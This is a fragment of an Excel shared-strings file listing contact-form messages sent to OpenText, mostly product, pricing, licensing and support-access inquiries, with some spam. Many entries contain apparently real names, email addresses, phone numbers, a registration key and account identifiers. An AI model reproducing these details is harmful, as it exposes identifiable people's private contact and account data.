    <t>Looking for ApplicationXtender partner and AP automation.</t>
  </si>
  <si>
    <t>I want ask about your partners in Egypt?</t>
  </si>
  <si>
    <t>Documentum Application Lifecycle Management und Kompatibilität:_x000D_
Bitte nehmen Sie mit mir Kontakt auf.</t>
  </si>
  <si>
    <t>Could you please transform my account to a Partner acount; I nead to submit a request to deal desk</t>
  </si>
  <si>
    <t>I've tried multiple times to ask for a quote on subscription to the software and an initial qualification. There has been no response via email or phone. I'm starting to get annoyed and so I am using any and all contact forms to get someone to help me give your company money.</t>
  </si>
  <si>
    <t>We are trying to provide additional concurrent user licences of a product once known as ImageAX View, supplied at the time by Spicer. Our customer operates a bespoke system with an ImageAX View 20 user concurrency licence (see registration key below) and they wish to increase by 10, 20 or 50 users, depending on price._x000D_
_x000D_
Could you please quote us for these three user licence options?_x000D_
_x000D_
Kindest Regards_x000D_
_x000D_
Registration Key:   5URU3-8MMNL-2MANG_x000D_
Customer:             The Coal Authority, Nottingham. UK.</t>
  </si>
  <si>
    <t>I need to report abuse of your services (mail through xmr3) by Plimsoll. I have unsubscribed from these emails MULTIPLE times, I have even reported their abuse to yourselves in the past._x000D_
I need to speak to somebody today regarding this or I will be filing a complaint with the ICO for a breach of GDPR regulations. _x000D_
With my previous request you should have ensured that our company emails could not be re-subscribed by Plimsoll to their mailing lists._x000D_
We do NOT consent to these emails and I have evidence of my past requests to not receive them which have been ignored._x000D_
Please contact me ASAP.</t>
  </si>
  <si>
    <t>I'm an existing customer with "xECM for SAP" license. Please guide me how to get access to My Support portal. I need to check the installation guide mentioned in the SAP Note 2274873.</t>
  </si>
  <si>
    <t>Hello, its Luke from Bens Gutters. _x000D_
I have a gutter cleaning team working in Earley, available to clean gutters over the next 2 weeks, equipped with our long reach access system, for a quote please don't hesitate to call me on 0800 0461058  _x000D_
Best, Luke</t>
  </si>
  <si>
    <t>Our company would like to chose one kind of document managment system, Documentum may be  a good choice. Kindly please let your chinese guy or agent contact with me,thanks.</t>
  </si>
  <si>
    <t>Guten Tag,_x000D_
_x000D_
wir benötigen ein Angebot für 2x Exceed von Opentext, an wen können wir uns hier wenden?_x000D_
_x000D_
Über eine schnelle Rückmeldung wäre ich Ihnen sehr dankbar._x000D_
_x000D_
Herzliche Grüße,_x000D_
Vesna Taceva</t>
  </si>
  <si>
    <t>Access to support site is not possible. Site keeps asking for verification email but email verification has allready been done several times.</t>
  </si>
  <si>
    <t>Dear OpenText team,_x000D_
based on my e-mail from last week, I want to ask you about my question "update my profile to partner account". Could you please send me any answer, what is necessary to provide you or what I need to do._x000D_
I am a new member of your partner - Sabris CZ, s.r.o. and my manager Martin Hanusek (martin.hanusek@sabris.com) has had this kind of account. He has access to knowledge base, etc._x000D_
Please, let me know, what is the status of my request or if you need some more information/approval from my manager side. _x000D_
Thank you so much._x000D_
_x000D_
Have a nice day._x000D_
_x000D_
Kind Regards,_x000D_
_x000D_
_x000D_
Josef Kotyza_x000D_
Business Consultant_x000D_
Sabris CZ, s.r.o._x000D_
Prague</t>
  </si>
  <si>
    <t>Hi - we are currently planning on migrating the servers for our Hummingbird application over to our Azure Cloud and would like confirmation on the following questions.  Our current version is 10.5_x000D_
_x000D_
Are there any license implications by moving the Hummingbird application servers to the Cloud?_x000D_
Are there any issues with running this version of Hummingbird in the Azure Cloud?_x000D_
Will the same level of support continue if we move the Hummingbird application to the Azure Cloud?_x000D_
_x000D_
Many thanks_x000D_
Dan</t>
  </si>
  <si>
    <t>Здравствуйте, я копирайтер, пишу тематику вашего сайта, за 1000 символов без пробела 100 руб. _x000D_
Если Вас заинтересовало, отпишитесь. _x000D_
 _x000D_
с уважением, Дарья Малинская.</t>
  </si>
  <si>
    <t>unable to log into account</t>
  </si>
  <si>
    <t>Hi,_x000D_
We receive new 850 format by our customer with new separator }._x000D_
I saw that the separator is removed._x000D_
Please check and advise._x000D_
Thank you._x000D_
Regards,_x000D_
Quentin Benedetto</t>
  </si>
  <si>
    <t>Discovery solution</t>
  </si>
  <si>
    <t>Hello_x000D_
I'm looking for pricing for the fax solution for a client. _x000D_
Rujuta</t>
  </si>
  <si>
    <t>Need advanced 2000 dollars immediately</t>
  </si>
  <si>
    <t>Hello _x000D_
_x000D_
We are currently searching for a DAM solution that best fits out business. We have looked into cloud-based DAM's and feel they will not be robust enough for the file sizes we deal with. We would also like to implement a DAM system onto our local server's. Can we have a demo of the Cumulus DAM functions? we would provide you with the files we want used, and some instructions as per functions we are looking for in a DAM</t>
  </si>
  <si>
    <t xml:space="preserve">Demo &amp; pricing </t>
  </si>
  <si>
    <t>Looking for an updated version of eDOCS DM10 if there is one. I'm building an installation package in SCCM, and all goes well, but during the install onto Windows 10 (works on Win7), Explorer.exe shuts down, and does not restart. I imagine this is because of differences in Windows 10 and 7. We currently are installing version 10.0.1220 Extensions Pack 3</t>
  </si>
  <si>
    <t>Looking for contact to recertify my ENCE. Certification# 15-0909-3271</t>
  </si>
  <si>
    <t xml:space="preserve">Hello! I am a Guidance Software customer using Encase and I'm trying to find out what products I'm licensed for. Additionally, I've confirmed my email registration for support but I still can't get into the support portal. </t>
  </si>
  <si>
    <t xml:space="preserve">Need assistance with template issue.  Ben Willoughby previously was working on this with us but the case was closed without resolution.  </t>
  </si>
  <si>
    <t>Pricing Request for MFP Software</t>
  </si>
  <si>
    <t>Partnership (solution integration) - Documentum + ContentServer</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, I currently have an invoice (1809863688) that i need to send payment for. Can you please send me a W9 so i can add Open Text to our accounting system and begin the pay cycle? </t>
  </si>
  <si>
    <t xml:space="preserve">Demo on solutions and fax integration within EpicCare for Ambulatory such as: _x000D_
- Communication Management / Provider Documentation Routing_x000D_
- HIM - Release of Information Faxing_x000D_
- HIM - Provider Deficiency Letter Faxing (FYI, this is not commonly done, but possible)_x000D_
- Referrals - Referral Fax Notifications_x000D_
</t>
  </si>
  <si>
    <t>Need to discuss old 401K Program from Hummingbird with HR Department ASAP._x000D_
Please contact me at the above email and phone number.</t>
  </si>
  <si>
    <t>Need msi for HostExplorer 15.0.3</t>
  </si>
  <si>
    <t>We are at a critical stage in our review of options for content management as well as trade association management. We are developing requirements for the Industrial Internet and have a need for OpenText or similar product to replace our current solution. Please call. My cellphone is (617) 780-5013_x000D_
Thanks._x000D_
Harriet Costa</t>
  </si>
  <si>
    <t>Good Afternoon, _x000D_
I'm interested in speaking with someone to understand product capabilities. I'm researching document control applications, and would like to learn more about Documentum and/or other document control software you provide. I work for a chemical manufacturer and we control safety documents, operating procedures, operating instructions, engineering drawings, inspection documents. I'm interested in those areas and other opportunities we can leverage (approval routing, communications, etc....).</t>
  </si>
  <si>
    <t>What databases does Teamsite CMS support?</t>
  </si>
  <si>
    <t>Is Documentum Records Manager v6.8 compatible with Documentum v6.7 and v.7.2?</t>
  </si>
  <si>
    <t>WE ARE LOOKING FOR SOFTWARE THAT CAN GENERATE GS1-128 LABELS AND A THERMAL PRINTER</t>
  </si>
  <si>
    <t xml:space="preserve">Hello there!_x000D_
I’m Daniel from AppleOne Employment Services in Newport Beach. I was advised to contact you through the website in regards to a candidate that I’m assisting on her job search that’s coming from the same industry. Let me know if you’re interested in reviewing her resume._x000D_
_x000D_
Kim - Over 15 years of experience working as an Accounts Receivable and Collections Specialist in your industry. When we did her reference check, The Controller of her last company stated “Kim was above and beyond with aging! She collected $4 million dollars quickly over the first 3-4 months she was with the company! She was a Rock star!”  _x000D_
_x000D_
Please keep myself and AppleOne in mind should you decide to use any staffing firms for your vacancies either on a temporary basis or to assist with filling open positions.  If you’d like, I’d be more than happy to share the different services AppleOne provides and why many of the companies I work with use our services.  They found that we’re both efficient, cost effective and a great source to go to for staffing needs. </t>
  </si>
  <si>
    <t>We use OpenText in Finance and recently had an OpenText  product demo from SAP. In Order Processing we are starting a project to automate our global Order Processing and as we currently process orders in Salesforce I would like to discuss automated data extraction into Salesforce and how you can assist as our requirements extend across other systems.</t>
  </si>
  <si>
    <t>We are looking to change our D/CMS.  We are currently using Nolij.  I would like to share more information of our needs with you.  And get more information of your CMS product and if we can get a preliminary quote for deploying it in our organization.  Email is usually better for me to share info with you, before getting in touch over the phone.  _x000D_
Thank you._x000D_
Ognjen.</t>
  </si>
  <si>
    <t>Transitioning from paper to digital files</t>
  </si>
  <si>
    <t>We want to purchase seats for Brava DXP. I have some questions before we proceed.</t>
  </si>
  <si>
    <t>-looking for a document management system that will integrate with Salesforce_x000D_
-currently have no system (saving documents locally on shared drives around the world)_x000D_
-company size is about 1100 people worldwide_x000D_
-will have limited manpower resources for the initial implementation</t>
  </si>
  <si>
    <t xml:space="preserve">Private OpenText training </t>
  </si>
  <si>
    <t>quote on forensic data collection</t>
  </si>
  <si>
    <t>Looking for more information and high level demo on a CCM document solution.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, we haven't received your invoice for September. Can you please email us a copy? </t>
  </si>
  <si>
    <t>GE Aviation currently has approved the use of OpenText Enterprise Now 15.  Before I purchase this product, I would like to confirm it will work on a Windows 10 64bit platform, and that it includes Exceed.  Thank you.</t>
  </si>
  <si>
    <t>Cost estimation for Documentum and RightFax products to be deployed on Oracle Public Cloud</t>
  </si>
  <si>
    <t>To Whom It May Concern_x000D_
_x000D_
We would like to get a service provider to help us to meet the requirements of the FDA, because we do not have the technological tools for quality control, therefore we would like to know if a video call or a visit to our offices (in Mexico City) could be scheduled this month._x000D_
_x000D_
Kind regards.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, I need to Register a license deal; unfortunately I cannot access the deal desk. Could you please check whether my account is prperly set up (Partner Account) </t>
  </si>
  <si>
    <t xml:space="preserve">We are in need of support and software updates. </t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I would like to know if it's still possible to buy the old Exceed v7.0 from you. If so, can I get a quote and lead time to get one single license. We are building an old PC with windows XP operating system. That's why we need an older version of Exceed which is compatible with windows XP._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Joe</t>
  </si>
  <si>
    <t xml:space="preserve">I am searching for a Supplier who could deliver Adobe Connect Support for Novartis (it is a Virtual moderation services through Adobe Connect). _x000D_
Novartis is looking for a Vendor to provide moderation service for global learning events, at an expert level. They desire a company who is providing the service directly._x000D_
Could you please contact me so I can share with you more information?_x000D_
Best regards_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Edge Information is attempting to obtain employment verification (dates &amp; title) for a previous employee of Gupta Technology named RAKESH GUPTA. Would you be able to inform us on how we may obtain this information? </t>
  </si>
  <si>
    <t>I have just registered as I'm looking to obtain the latest version of OpenText Exceed, could this be set-up for me please._x000D_
The software is registered under the following:_x000D_
Product Line – Connectivity_x000D_
EU Number – EU0185567_x000D_
Co Worker – Alan Campbell_x000D_
SUID – V0532-29001_x000D_
_x000D_
Katy Atkinson provided me with the info above but I did not select 'mysupport' when I registered._x000D_
_x000D_
Thansk</t>
  </si>
  <si>
    <t xml:space="preserve">Please help, Infosistem d.d. doesn't have access to make Deal registration regarding Capital Project Express for two Customers. _x000D_
Ingram Micro is our official distributor for OpenText._x000D_
</t>
  </si>
  <si>
    <t>Good morning,_x000D_
_x000D_
Looking to get MySupport for my account. Currently getting the 403 Error - Access Denied. _x000D_
_x000D_
Thank you,_x000D_
_x000D_
Kirsten Winter</t>
  </si>
  <si>
    <t>Can you please send me detailed information about licensing the various products? Sorry if i start complaining in my first contact, vbut I really dont like website showing products but not showing pricing, it is very unprofessional in my optinion.</t>
  </si>
  <si>
    <t>GXS CORPORATE TRAINING</t>
  </si>
  <si>
    <t>I need to receive the quotation for the emulation software Exceed and the is is possible characteristic for the PC. This request is very urgent for us. Please can you reply as soon as possible. Regards Gladiola Sina</t>
  </si>
  <si>
    <t>Hello, i m trying, from a script/program, to get access to a directory on our sharenet/opentext/webdav protocoled directory. I have this error :_x000D_
_x000D_
OpenSSL: error:14094410:SSL routines:ssl3_read_bytes:sslv3 alert handshake failure_x000D_
Unable to establish SSL connection. _x000D_
Can you help me please?_x000D_
Thanks</t>
  </si>
  <si>
    <t>I came to your site looking for ACTUATE BIRT. Do you still support that Product ? I am looking for a Business Analytics Tool like BIRT</t>
  </si>
  <si>
    <t xml:space="preserve">Dear HR Team,_x000D_
_x000D_
Greeting from Sellcraft Global Solution Pvt. Ltd...!_x000D_
_x000D_
We (Sellcraft Global Solutions Pvt. Ltd) are growing consulting firm and have worked on several technologies primarily on all ERP's with IT/ITES companies ._x000D_
We are working for contract (C2H) and permanent hiring and placed several lateral and executive level. _x000D_
We are also involve in bulk hiring and supporting multiple clients across India, namely TCS, Cognizant, L&amp;T, Tech Mahindra, Accenture, Mphasis and Mindtree etc. among others. _x000D_
Our branches are spread across the country, spanning Pune, Bangalore, Chennai and Hyderabad. _x000D_
_x000D_
We have a strong recruitment team with excellent strength technical Setup, as well as Market knowledge and experienced senior recruiters/Lead who can address your business needs on time and in full._x000D_
_x000D_
To grow further we would like to be the part of your esteem organization.  Kindly find the attached company profile for your kind consideration._x000D_
_x000D_
I would kindly request you to share the meeting calendar so that we can schedule a meet for the same to understand your business needs._x000D_
_x000D_
Your prompt response will be appreciated. _x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I have created a new account in OpenText. I am getting the following error:_x000D_
_x000D_
OpenText Connect_x000D_
No Access_x000D_
Your account does not grant you access to this resource._x000D_
Could you please provide access or guide me through the process._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I have created my account in Opentext. I am getting an error message when I am trying to raise ticket saying ACCESS DENIED._x000D_
Kindly do the needful._x000D_
</t>
  </si>
  <si>
    <t>Hi!_x000D_
_x000D_
We have several valid licenses for EnCase Forensic. Accounts for support, updates and forum are not valid any more. I have just registered with Opentext. Please instruct me how I can access services so far._x000D_
_x000D_
Andriy</t>
  </si>
  <si>
    <t>I can't access to Mysupport ...</t>
  </si>
  <si>
    <t>When I go to License Key or Upgrade RequestLicense Keys I'll get message bleow:_x000D_
_x000D_
"We're sorry, your account does not grant you access to this resource."</t>
  </si>
  <si>
    <t>Can we have a quick phone call so we can discuss your IT/Software needs (custom software - mobile app - web app - CRM - ERP)?</t>
  </si>
  <si>
    <t>Hello - we are considering using Rightfax for our automated email to fax solution. Can you answer a simple question for me please? Is it possible to have it set-up for test (non-production) systems, but for faxes to be blocked and then possibly viewed by the testing teams?</t>
  </si>
  <si>
    <t>I need a quotation for Spicer Imagenation.</t>
  </si>
  <si>
    <t>Our reseller Insight has been trying to contact you since September to obtain a quote for 2 different requests for Actuate e spreadsheet designer but are not getting any reply. Any particular reason for not responding ? This in turn is hampering our performance and the Business is chasing us for a status. Do you in any way want us to contact you direct for a quote  and not through Insight ? Please let us know at the earliest as we want the 2 quotes ASAP. If there is any escalation point, then please let us know.</t>
  </si>
  <si>
    <t>I have tried, multiple times, unsuccessfully to request to pay the billing online. I have requested and received the confirmation email which I have confirmed my email. The site still does not allow me to pay online. I need assistance. Thanks</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
Are you interested to AS400 Users?_x000D_
_x000D_
We have 1830 Ready-to- buy leads of AS400 Technology Customers Records from Australia._x000D_
_x000D_
Test File will be given to review and check the quality without any obligations. _x000D_
Would you like me to send you a Test data and additional information?_x000D_
_x000D_
Thank you.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
Are you interested to SAP BI Users?_x000D_
_x000D_
We have 2,873 Ready-to- buy leads of SAP BI Technology Customers Records from Australia._x000D_
_x000D_
We can provide Test_x000D_
file without any obligations. let me know your interest on the same_x000D_
_x000D_
Thank you_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>request for quote on T2U disk duplicator within Singapore</t>
  </si>
  <si>
    <t xml:space="preserve">Hi._x000D_
Would like to find out more about your OCR/Document processing automation features as well as it's integration to SAP. _x000D_
Our office is in Singapore hence would appreciate if you have a local representative that can come onsite to our office to share your solution, case study, implementation approach as well as cost structure._x000D_
_x000D_
Thanks_x000D_
</t>
  </si>
  <si>
    <t>Would like to understand licencing model for a business with thousands of users or a Non-profit foundation aimed at helping writers digitize._x000D_
_x000D_
Thanks for your help,_x000D_
Eli</t>
  </si>
  <si>
    <t>Two reasons,_x000D_
First, created an account and now getting access denied._x000D_
_x000D_
Second, We have recently installed OpenText 16.3. I am wanting to create a super user who can administer their own applications, which I can do. I also want to be able to restrict the super user to only assigning staff to specific groups that they have assigned to an application, not finding how to do that.</t>
  </si>
  <si>
    <t>I am trying to do a renewal for RightFax Express 4 Line Analog. We purchased in 2016 from Earthbend and they say they no longer sell this line.  Who could help me with this.  I need to renew the RightFax Express 4 Line Analog Advanced Replacement Support. Thanks</t>
  </si>
  <si>
    <t>would like info to open new account so I can use eservice rather than a fax machine</t>
  </si>
  <si>
    <t>I would like help or access to community list to post question for updating my BIRT report.</t>
  </si>
  <si>
    <t>We are looking for EDI Translator. We have Oracle E-Business Suite and looking to bring vendor invoices using EDI.</t>
  </si>
  <si>
    <t xml:space="preserve">We are evaluating several DM management systems for integration with Sharepoint. </t>
  </si>
  <si>
    <t>I am looking for the Terms and Conditions &amp;/or Handbooks related to RightFax and RightFax Maintenance in relation to the Terms and Conditions noted on Renewal Notice RC324313. I can't seem to locate them on the website. Thank you.</t>
  </si>
  <si>
    <t xml:space="preserve">We are looking to sign staff up to the OpenText Learning On Demand Subscription, but I have a query around this T&amp;C:_x000D_
•	Each registration covers one named student. The assigned student cannot be changed after the account has been accessed._x000D_
Can you please confirm what happens if this one named person leaves Techtonics - can it be transferred to someone else for the remainderof the year?_x000D_
_x000D_
Thanks _x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">PO 3000026128 - To expedite future invoices please send them via email to: mnit.accountspayable@state.mn.us   </t>
  </si>
  <si>
    <t>To Whom It May Concern:_x000D_
_x000D_
My organization has a need for a document management system to help with our awards program. We have dual requirements for workflow and functionality to support an award/application process, including internal review, as well as a traditional document management needs. Can we discuss what might be possible through OpenText?_x000D_
_x000D_
Thank you,_x000D_
_x000D_
Elizabeth</t>
  </si>
  <si>
    <t xml:space="preserve">I wanted to download the newest version of Encase </t>
  </si>
  <si>
    <t>My name is Kayla Bonilla, and I am a student in the marketing department of Adult &amp; Teen Challenge of Texas. We are a 12 month, faith based residential program here in San Antonio aimed at helping men and women overcome life controlling issues. We are a 501(c)3 organization. I am contacting you concerning our  annual Freedom Run 5K. It's our pet friendly family event with a superhero themed Toddler Trot! The race is scheduled to kick off here in San Antonio on Saturday, January 19, 2019. _x000D_
The 5k is one of our signature fundraising events and draws San Antonio's most devoted supporters who are passionate about recovery in our city. We are looking for vendors on the day of the event as well as goody bag items for the runners. Additionally, if you know of any runners whom you think would like to participate, please extend to them our invitation as well! We are expecting many of our dedicated supporters this year, and our attendees are conscientious and caring members of the community who are highly active consumers of all types of products and services in the San Antonio area. _x000D_
I am attaching a sponsorship brief for your review, and I would love to discuss with you further the opportunities available this year. Please give me a call or email me at your earliest convenience. Thank you so much in advance for your time and consideration of my request._x000D_
_x000D_
Kayla Bonilla_x000D_
Race Coordinator</t>
  </si>
  <si>
    <t>We are planning sap archive project and need access white paper for opentxt. Thanks.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi There, I work for AAA Life and we have a product support for Xpression. I would like to open a ticket with expression to fix a prod issue but for some reason, I am getting below message when I try to open an incident. Can you please fix the permissions issue so that I can open a ticket?_x000D_
_x000D_
"No Access_x000D_
We're sorry, your account does not grant you access to this resource."_x000D_
Regards,_x000D_
Farhan Mirza_x000D_
Account Name: AAA Life Insurance Company_x000D_
System Name: XPression_x000D_
Product Line: Documentum_x000D_
</t>
  </si>
  <si>
    <t>Hi, I have reset my email address (from raul.novillo@anida.es to raul.novillo@divarian.com) and now I am unable to enter, since I receive an "Access Denied" message. _x000D_
Thnak you</t>
  </si>
  <si>
    <t xml:space="preserve">Request to pay invoices via ACH. _x000D_
I see banking information on the invoice, I'd just like to confirm with someone that this is correct and also get an email address where remit advice should be sent. </t>
  </si>
  <si>
    <t>Looking at pricing for digital process automation software</t>
  </si>
  <si>
    <t>For Student and research</t>
  </si>
  <si>
    <t>Pricing for prospective US Government Clients</t>
  </si>
  <si>
    <t>I need to get my account reset so that I can view SRs submitted by my team. I cannot even reset my password at this point. I believe out Site ID is EU0273037 for Documentum support issues. Our former Documentum (EMC) site was 5275466.</t>
  </si>
  <si>
    <t>Anfrage / RFI</t>
  </si>
  <si>
    <t>HelmsBriscoe is a complimentary service who helps find the best hotels and venues for your upcoming meeting, conference, or convention.  I know you are busy, so I'd greatly appreciate 5 minutes of your time to discuss our complimentary services._x000D_
_x000D_
CH</t>
  </si>
  <si>
    <t>I have completed the CFCE through IACIS. The lab uses Encase as one of the forensic programs. I would like to attend training for Encase. I went through the your training list, but all I see is EnCase certification. I have no knowledge of Encase, so I assume there would be a different type of training before going into the certification. Are there alternatives, or is the Encase certification what I need?</t>
  </si>
  <si>
    <t>Issue with Execute360_x000D_
There are various folders that are inaccessible and give the error "frmQuery - RetrieveNthItem: Workitem open failed" when attempting to open the folder. Also:_x000D_
"RetrieveItem: Workitem open failed.; Error UserForm_QueryClose"_x000D_
Other errors that appear include:_x000D_
"Server API error: NetGetLastError provides no additional information"_x000D_
"Server API function QUEUnLockEntry failed."_x000D_
There are all in:_x000D_
-BOATUS; Workflow_x000D_
-Active Claims; Workstep_x000D_
-IMGMAIN2; Server_x000D_
-Names/Internal Names;_x000D_
18BSP09280/18252WMS2000184_x000D_
18BUS04318/18161WMS20002AA_x000D_
17BUS06645/17242WMS2000CE8_x000D_
18BSP06193/18199WMS20005DD_x000D_
18BUS09352/18234WMS20002E0_x000D_
18BUS10630/18254WMS200041D_x000D_
18GPP00215/18252WMS20000A3_x000D_
18BUS09476/18235WMS20007D1_x000D_
18BUS10549/18252WMS2000138_x000D_
-Folder; Type_x000D_
-CLAIMNOL; Class_x000D_
-0; Error Code for all except 1_x000D_
-5; Error Code for 18BSP06193/18199WMS20005DD_x000D_
These issues started on 2018-10-01 when our RouteEngine Domain service when down due to issues with ROUTEWORKER._x000D_
Would like to see why these errors are going on and also if there is a way to reintroduce these folders into the system to become accessible again. For now the documents associated with each folder can be searched through the Virtual Folder or find.</t>
  </si>
  <si>
    <t>Invoice/Billing questions</t>
  </si>
  <si>
    <t>Good Morning:_x000D_
_x000D_
On last week, I sent a request for information related to the Document Management System.  I contacted Dell/EMC group and they informed that they sold to you the EDM system._x000D_
_x000D_
I want to implement the system here in Vistapharm._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Sonia</t>
  </si>
  <si>
    <t>Hi Team,_x000D_
_x000D_
I currently work in Open Text Stream Serve 5.6.2 technology in Ericsson India Global Services Pvt. Ltd., Kolkata since last 4years. _x000D_
_x000D_
Now I want to gain knowledge about Opentext ECM Archive Server/Content Server in detail. Request you to kindly suggest me a way to get the same (Onine Course material or Documents) as soon as possible._x000D_
_x000D_
Thank you for your support.!_x000D_
_x000D_
Thanks and regards,_x000D_
Anik</t>
  </si>
  <si>
    <t>are you guys offering a visual analytics/dashboard platform specifically for OpenText Customer Communications Management (CCM) solution as well?</t>
  </si>
  <si>
    <t>we are looking to find a solution for gathering customer Feedback (omnichannel: including voice Feedback via automated IVR Surveys) we can recommend to our customers. We are a contact Center and work for different Clients across all industries. _x000D_
Ideally, we are looking for a Long-term partnership in the area of Feedback Management._x000D_
_x000D_
My main concerns are therefore: _x000D_
- data Hosting / storage within the EU? (our Client base is mostly located in Germany and therefore quite sensitive regarding data protection laws)_x000D_
- capabilities of the Software (reporting functionalities, organising Multi account Management (different Survey Projects on one platform), channels integrated (E-Mail, Website, in app, voice, etc.) and look an feel. _x000D_
_x000D_
Looking Forward to receiving more Information from you. _x000D_
Melanie Schnitzler</t>
  </si>
  <si>
    <t>Please cancel my hightail account.  Im not dissatisfied; I simply don't have sufficient occasion to use it._x000D_
Thanks._x000D_
Jack R. Stern_x000D_
_x000D_
last receipt number: _x000D_
Your receipt_x000D_
Order ID: ch_1DIcYECoGUa9VTUcQkqJ8Ewv_x000D_
_x000D_
Your Card •••• •••• •••• 0609 was charged $15.00_x000D_
You'll be charged $15.00 every month</t>
  </si>
  <si>
    <t xml:space="preserve">Dear OpenText/Documentum Team_x000D_
_x000D_
We are evaluating possible archiving solutions for one of our clients that moves from SAP ECC 6.0 to SAP S/4 Hana. In their transition, they would like to archive the data in the SAP ECC 6.0 and migrate it to the S/4 Hana to be able to still retrieve the archived data. Hence, the following question arise:_x000D_
_x000D_
1)	Since our client is using the Documentum solution for archiving in SAP ECC 6.0, we are wondering whether you also support S/4 Hana archiving of financial journal entries_x000D_
2)	If yes: Do you use the same product for the archiving of S/4 Hana solution as the one for SAP ECC 6.0 or is the client obliged to buy a new product with a different license_x000D_
3)	If yes: How do we integrate the archiving solution with S/4 Hana? Is the archiving solution an add on, stand alone or integrated on top of S/4 Hana? _x000D_
4)	The client will use S/4 Hana on premises – Is this compatible with your solution?_x000D_
5)	How flexible is the data retention in your product? Can you define which financial journal entries the client wants to keep for 10 years, 5 years, 2 years?_x000D_
_x000D_
Thank you very much for the information._x000D_
_x000D_
Regards,_x000D_
Fabrice Gürmann_x000D_
</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
please contact me regarding switching form your regular email servers to your trusted platform._x000D_
We use your email services for sending transactional emails from our trading system to our customers and partners. _x000D_
_x000D_
I would be glad to know what needs to be changed on our side (organizational and technical) to use your more reliable and trustworthy email servers for example to get rid of email blocking._x000D_
_x000D_
I just tried to get more information from the page, that was communicated to me: utility/legal/use-policy.php - but this is redirected to an https service, for which I get a certificate error (certificate is issued for actuate dot com) - when I finally reach the page it says "Page Not Found"._x000D_
_x000D_
Oh, and by the way - this is the second time I write all this down in your contact form, because it says, I am not allowed to enter a URL in the reasons dialog - after that all input fields are empty again and I need to start over... Seems to be an issue with Chrome browser. Not really customer orientied, I am sorry to tell it this._x000D_
_x000D_
But nevertheless, I am looking forward to getting in touch with you to proceed with the main topic (change of the platform)._x000D_
_x000D_
Kind regards,_x000D_
Christopher Kaschig</t>
  </si>
  <si>
    <t xml:space="preserve">I am interested in knowing your software for handwriting recognition.  Could you please give me a call to discuss? thanks. </t>
  </si>
  <si>
    <t>Evaluate Brava! Viewer integration with Bentley Assetwise eB/ALIM._x000D_
Can we set up a demo or Trial?</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, my organization would like to implement an electronic Document Management Systems and Documentum comes across as one that is well-established in the life sciences sector. Would therefore like to request for a demo of Documentum to my team and subsequently discuss towards a quotation from OpenText for appropriate Documentum solution that can meet our organization's GMP requirements._x000D_
Thanks in advance and look forward to hearing from Opentext._x000D_
</t>
  </si>
  <si>
    <t>Want to Upgrade from Documentum from existing version which is EOSL to the current version.</t>
  </si>
  <si>
    <t>I would like some costs on the following:_x000D_
Encase training course on forensic examination of Laptops, Servers Mobile devices for 6 people done on premis if possible._x000D_
_x000D_
What would the individual course cost be if it was done in your training department in Slough.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
Our organization has the business needs to build up a knowledge/information management platform, please contact me for more information._x000D_
</t>
  </si>
  <si>
    <t>We are reviewing various CMS options available and wonder if we could arrange a demo of OpenText TeamSite and get some information about the future of OpenText Web Site Management, which we are currently on, and also some information on the OpenText Web Experience Management and the differences between the products._x000D_
_x000D_
Many thanks_x000D_
_x000D_
Mike</t>
  </si>
  <si>
    <t xml:space="preserve">Documentum </t>
  </si>
  <si>
    <t>We are looking for training in the following, preferably in the UK -  _x000D_
1-0184	Managing Documents in Content Server_x000D_
1-0185	Collaborating in Content Server v16_x000D_
_x000D_
The online schedule did have the 2 courses together (26-28 November plus 29-30 November) but I can't locate that now._x000D_
There will be 2 staff travelling from Qatar and we need to have the courses together. Can you please advise the best option for us?   _x000D_
Thanks_x000D_
Matthew Platt</t>
  </si>
  <si>
    <t xml:space="preserve">SAP Senior Consultant with 13 years of experiance and ABAP Certified professional.looking for the oppurtunity in abroad.Holding H1-B visa  and interested to work in any of these countires canada swis,Germany </t>
  </si>
  <si>
    <t xml:space="preserve">Hi_x000D_
_x000D_
We can help your website to get on first page of Google and increase the number of leads and sales you are getting from your website. _x000D_
_x000D_
Please email us back for full proposal._x000D_
_x000D_
Best Regards_x000D_
_x000D_
angelina_x000D_
</t>
  </si>
  <si>
    <t>I am creating a hackathon and would like to have OpenText as a sponsor.</t>
  </si>
  <si>
    <t>How much does it cost to use your LMS?</t>
  </si>
  <si>
    <t xml:space="preserve">Hi OpenText Team_x000D_
_x000D_
We are preparing for hardware migration of our OpenText system and wanted to get your support. Who should I reach out to regarding getting the work quoted? _x000D_
_x000D_
Thanks_x000D_
_x000D_
Nick Milevski_x000D_
</t>
  </si>
  <si>
    <t>I would like to know who your local government clients are in Australia and NZ. We are looking at writing an integration with your system for Auckland City Council.</t>
  </si>
  <si>
    <t>Mu Magellan Roadmate is not recognizing new areas!</t>
  </si>
  <si>
    <t>We are a client of Mediterranean Shipping Company Pty Ltd. They send us shipping documentation protected with openText._x000D_
Currently it seems that the latest version of IRM client for PDF (v5.1 SP2) no longer supports the latest version of Adobe Reader DC (v19.008.20071)_x000D_
When opening Adobe reader the following error is shown "IRM Client for PDF cannot run with this version of Acrobat. Please check openText website for a newer version of the IRM Client"_x000D_
Is there a newer version out then what is currently offered on your website?_x000D_
_x000D_
Note: when we get the above error message, adobe reader is no longer able to print anything, regardless of it being protected by OpenText or not.</t>
  </si>
  <si>
    <t>Sorry wrong email</t>
  </si>
  <si>
    <t xml:space="preserve">me gustaria saber los precios de la plataforma </t>
  </si>
  <si>
    <t>Enquiring on the availability of: 3-0188 OpenText Content Server System Administrator v16.2 _x000D_
we would be looking for 2 delegates on a virtual course</t>
  </si>
  <si>
